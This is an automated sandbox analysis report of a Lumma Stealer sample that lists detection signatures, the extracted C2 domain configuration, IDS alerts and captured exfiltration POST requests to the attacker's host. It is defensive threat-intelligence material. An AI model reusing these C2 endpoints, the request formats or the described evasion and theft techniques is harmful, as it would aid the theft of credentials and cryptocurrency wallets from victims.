Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1585859
MD5:6446a00eb59754e15749af229b0d5217
SHA1:69c0311f0b121eb378e90a1dd88925c424c1a07b
SHA256:558fe8c705bbd035f886cc02acee3fdfa50398e74795f62d182e01225d58e2e2
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • random.exe (PID: 6732 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6446A00EB59754E15749AF229B0D5217)
    • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • random.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6446A00EB59754E15749AF229B0D5217)
    • random.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6446A00EB59754E15749AF229B0D5217)
    • WerFault.exe (PID: 7160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cloudewahsj.shop", "framekgirus.shop", "abruptyopsn.shop", "pancakedipyps.click", "tirepublicerj.shop", "rabidcowse.shop", "nearycrepso.shop", "wholersorie.shop", "noisycuttej.shop"], "Build id": "FATE99--test"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:46:57.624092+010020283713Unknown Traffic192.168.2.449731188.114.97.3443TCP
        2025-01-08T11:46:58.723867+010020283713Unknown Traffic192.168.2.449733188.114.97.3443TCP
        2025-01-08T11:46:59.832079+010020283713Unknown Traffic192.168.2.449736188.114.97.3443TCP
        2025-01-08T11:47:02.382077+010020283713Unknown Traffic192.168.2.449740188.114.97.3443TCP
        2025-01-08T11:47:03.904266+010020283713Unknown Traffic192.168.2.449742188.114.97.3443TCP
        2025-01-08T11:47:05.131058+010020283713Unknown Traffic192.168.2.449744188.114.97.3443TCP
        2025-01-08T11:47:06.348119+010020283713Unknown Traffic192.168.2.449746188.114.97.3443TCP
        2025-01-08T11:47:10.415669+010020283713Unknown Traffic192.168.2.449749188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:46:58.190213+010020546531A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
        2025-01-08T11:46:59.202131+010020546531A Network Trojan was detected192.168.2.449733188.114.97.3443TCP
        2025-01-08T11:47:10.911021+010020546531A Network Trojan was detected192.168.2.449749188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:46:58.190213+010020498361A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:46:59.202131+010020498121A Network Trojan was detected192.168.2.449733188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:46:57.624092+010020583981Domain Observed Used for C2 Detected192.168.2.449731188.114.97.3443TCP
        2025-01-08T11:46:58.723867+010020583981Domain Observed Used for C2 Detected192.168.2.449733188.114.97.3443TCP
        2025-01-08T11:46:59.832079+010020583981Domain Observed Used for C2 Detected192.168.2.449736188.114.97.3443TCP
        2025-01-08T11:47:02.382077+010020583981Domain Observed Used for C2 Detected192.168.2.449740188.114.97.3443TCP
        2025-01-08T11:47:03.904266+010020583981Domain Observed Used for C2 Detected192.168.2.449742188.114.97.3443TCP
        2025-01-08T11:47:05.131058+010020583981Domain Observed Used for C2 Detected192.168.2.449744188.114.97.3443TCP
        2025-01-08T11:47:06.348119+010020583981Domain Observed Used for C2 Detected192.168.2.449746188.114.97.3443TCP
        2025-01-08T11:47:10.415669+010020583981Domain Observed Used for C2 Detected192.168.2.449749188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:46:57.113787+010020583971Domain Observed Used for C2 Detected192.168.2.4580051.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:47:05.600120+010020480941Malware Command and Control Activity Detected192.168.2.449744188.114.97.3443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-08T11:47:06.352320+010028438641A Network Trojan was detected192.168.2.449746188.114.97.3443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: random.exeAvira: detected
        Source: https://pancakedipyps.click:443/apidfmbIAvira URL Cloud: Label: malware
        Source: https://pancakedipyps.click:443/api)Avira URL Cloud: Label: malware
        Source: https://pancakedipyps.click/apiPPAvira URL Cloud: Label: malware
        Source: https://pancakedipyps.click:443/apikAvira URL Cloud: Label: malware
        Source: https://pancakedipyps.click/apiUTAvira URL Cloud: Label: malware
        Source: https://pancakedipyps.click/ZAvira URL Cloud: Label: malware
        Source: https://pancakedipyps.click/laAvira URL Cloud: Label: malware
        Source: https://pancakedipyps.click/buAvira URL Cloud: Label: malware
        Source: 3.2.random.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["cloudewahsj.shop", "framekgirus.shop", "abruptyopsn.shop", "pancakedipyps.click", "tirepublicerj.shop", "rabidcowse.shop", "nearycrepso.shop", "wholersorie.shop", "noisycuttej.shop"], "Build id": "FATE99--test"}
        Source: random.exeReversingLabs: Detection: 65%
        Source: random.exeVirustotal: Detection: 76%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 90.1% probability
        Source: random.exeJoe Sandbox ML: detected
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: rabidcowse.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: noisycuttej.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: framekgirus.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: wholersorie.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: nearycrepso.shop
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: pancakedipyps.click
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000000.00000002.1783981542.0000000004089000.00000004.00000800.00020000.00000000.sdmpString decryptor: FATE99--test
        Source: C:\Users\user\Desktop\random.exeCode function: 3_2_00415D89 CryptUnprotectData,3_2_00415D89
        Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49749 version: TLS 1.2
        Source: random.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: Handler.pdbxa source: random.exe
        Source: Binary string: System.Windows.Forms.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.Windows.Forms.pdb(E source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: mscorlib.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.pdb) source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: Handler.pdb source: random.exe, WERD1D7.tmp.dmp.6.dr
        Source: Binary string: mscorlib.ni.pdbRSDS source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: Handler.pdba source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.ni.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: Binary string: System.pdb source: WERD1D7.tmp.dmp.6.dr
        Source: C:\Users\user\Desktop\random.exeDirectory queried: number of queries: 1001
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]3_2_00441816
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov eax, esi3_2_0043D0D0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]3_2_0043D0D0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]3_2_0040C080
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_004442E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [edx], cx3_2_00418BA2
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh3_2_00444C20
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, edx3_2_00430F03
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042F716
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]3_2_00417054
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]3_2_0041B021
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0041B021
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004438E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004438F9
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004438FB
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]3_2_00422880
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, bx3_2_00427885
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0041F170
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov dword ptr [ebp-2Ch], eax3_2_004421E9
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi+10h], 00000000h3_2_004421E9
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [esi]3_2_0041618C
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h3_2_0041BA52
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov esi, ecx3_2_0041BA52
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0041BA52
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh3_2_00402210
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_0043A230
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00431AF5
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]3_2_0040B280
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_00440A90
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]3_2_00441B50
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], bl3_2_00409360
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00422370
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042FB7D
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx eax, byte ptr [ecx+edi]3_2_00408320
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00419B30
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F3E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041B3F2
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, eax3_2_0041AB90
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then jmp ecx3_2_00428C62
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, eax3_2_00427C10
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]3_2_00414C30
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, eax3_2_00418492
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edx, word ptr [ebx]3_2_0043CD40
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042C5E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0041B58F
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_004195B6
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h3_2_004195B6
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov edi, edx3_2_0043E6E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx eax, word ptr [edx]3_2_0043E6E0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, edx3_2_00430F4E
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, edx3_2_00430F54
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [ebx], ax3_2_0041A770
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407730
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407730
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]3_2_00427FC0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]3_2_00427FC0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]3_2_004437D0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]3_2_0042A7F0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov edx, ecx3_2_0042A7F0
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov ecx, eax3_2_00427FFD
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov edx, ecx3_2_0042AF92
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0042AF92
        Source: C:\Users\user\Desktop\random.exeCode function: 4x nop then mov edx, ecx3_2_0042AFB0

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:58005 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49731 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49733 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49740 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49746 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49744 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49749 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49744 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49746 -> 188.114.97.3:443
        Source: Malware configuration extractorURLs: cloudewahsj.shop
        Source: Malware configuration extractorURLs: framekgirus.shop
        Source: Malware configuration extractorURLs: abruptyopsn.shop
        Source: Malware configuration extractorURLs: pancakedipyps.click
        Source: Malware configuration extractorURLs: tirepublicerj.shop
        Source: Malware configuration extractorURLs: rabidcowse.shop
        Source: Malware configuration extractorURLs: nearycrepso.shop
        Source: Malware configuration extractorURLs: wholersorie.shop
        Source: Malware configuration extractorURLs: noisycuttej.shop
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 188.114.97.3:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=83PVIUVIGUHSL4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18138Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=52X1V2I4DH724CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8759Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=97RJBEUIGRL98EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20412Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BMBE9NGHHGBJRN9PVABUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 988Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZR3AKJC6S0AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584031Host: pancakedipyps.click
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: pancakedipyps.click
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: pancakedipyps.click
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: pancakedipyps.click
        Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/Z
        Source: random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
        Source: random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiPP
        Source: random.exe, 00000003.00000002.1797182496.0000000000BE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiUT
        Source: random.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bu
        Source: random.exe, 00000003.00000002.1797182496.0000000000BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/la
        Source: random.exe, 00000003.00000002.1797182496.0000000000BCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/pi
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api)
        Source: random.exe, 00000003.00000002.1796969468.0000000000B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/apidfmbI
